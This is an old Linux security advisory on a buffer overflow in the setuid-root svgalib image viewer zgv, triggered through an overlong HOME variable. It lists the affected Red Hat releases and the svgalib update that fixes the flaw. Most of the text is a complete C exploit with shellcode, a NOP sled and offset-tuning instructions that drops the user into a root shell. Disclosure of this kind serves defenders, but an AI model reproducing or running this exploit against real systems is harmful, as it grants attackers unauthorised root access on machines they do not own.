COMMAND

    svgalib/zgv

SYSTEMS AFFECTED

    Redhat Linux 3.0.3 - 4.1 / Any Linux with zgv setuid root

PROBLEM

    svgalib 1.2.10 and  below do not  properly revoke privileges,  and
    through the  use of  saved user  ids, any  svgalib application may
    still be vulnerable to buffer overruns(stack overwrites).

    svgalib/zgv-2.7 is an svgalib GIF/JPG viewer.  zgv will take  data
    from an environment variable (HOME), and copies the entire  length
    of the  envirnment variable  into an  automatic character  buffer.
    The result is that arbitrary code may be executed as root.   There
    are also overflows on the command line and through stdin.

    With zgv,  the consequences  are minimal,  as only  a user who has
    access  to  the  console  can  exploit  this  hole.  However, most
    svgalib  applications   are  poorly   written  from   a   security
    standpoint and the potential compromise may be greater with  other
    applications.  This problem affects all releases of Red Hat  Linux
    on Intel platforms.

    Credit goes to KRS[T] and their advisory.

    Bryan P. Self made exploit. You  may have to play with the  offset
    a little....

    /*
     *
     * zgv exploit coded by BeastMaster V on June 20, 1997
     *
     * USAGE:
     *   For some strage reason, the filename length of this
     *   particular exploit must me one character long, otherwise you
     *   will be dropped into a normal unpriviledged shell. Go Figure....
     *   Try increasing the offest by increments of 10 if you get
     *   an Illegal Instruction or Segmentation Fault.
     *
     *   $ cp zgv_exploit.c n.c
     *   $ cc -o n n.c
     *   $ ./n
     *   Oak driver: Unknown chipset (id =  0)
     *   bash#
     *
     * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
     * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
     * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
     * DISCLAIMER: Please use this in a responsible manner.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    char *shellcode =
      "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
      "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
      "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
      "\xcd\x80/"
      "/bin/sh"
      "0";

    char *get_sp() {
       asm("movl %esp,%eax");
    }

    #define bufsize 4096
    char buffer[bufsize];

    main() {
      int i;

      for (i = 0; i < bufsize - 4; i += 4)
        *(char **)&buffer[i] = get_sp() -4675;

      memset(buffer, 0x90, 512);
      memcpy(&buffer[512], shellcode, strlen(shellcode));

      buffer[bufsize - 1] = 0;

      setenv("HOME", buffer, 1);

      execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
    }

SOLUTION

    svgalib-1.2.11 will address this security issue.  A newer  version
    of svgalib is now available which fixes this problem for users  of
    Red Hat Linux/Intel 4.0, 4.1, and 4.2.

    Red Hat  software strongly  recommends all  users with  svgalib or
    any software which requires svgalib be updated to this version  of
    svgalib immediately:

        Intel 4.0, 4.1, 4.2
        -------------------
        rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/svgalib-1.2.10-3.i386.rpm